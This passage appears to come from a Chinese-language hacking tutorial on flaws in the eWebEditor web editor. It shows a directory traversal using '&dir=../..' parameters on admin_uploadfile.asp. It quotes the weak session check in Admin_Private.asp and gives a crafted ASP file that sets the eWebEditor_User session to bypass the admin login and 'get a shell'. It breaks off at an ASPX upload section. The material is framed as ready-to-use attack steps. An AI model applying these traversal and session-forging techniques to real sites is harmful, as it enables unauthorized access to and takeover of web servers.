r/admin_uploadfile.asp?id=14在id=14后面添加&;dir=..再加 &;dir=../..或&;dir=xxxxx/../.. 看到整个网站文件了, 不过此项在测试的时候发现,只有登录成功才能进行这项操作。
Cookie漏洞
漏洞文件:Admin_Private.asp.
漏洞语句:
<% If Session(”eWebEditor_User”) = “” Then
Response.Redirect “admin_login.asp”
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个mrchen.asp内容如下:
<%Session(”eWebEditor_User”) = “11111111″%>
访问mrchen.asp,再访问后台任何文件,for example:Admin_Default.asp这个拿shell的方法就简单了.
ASPX版
Javascript文件上传
受影响文件:eWebEditorNet/upload.aspx
原理:代码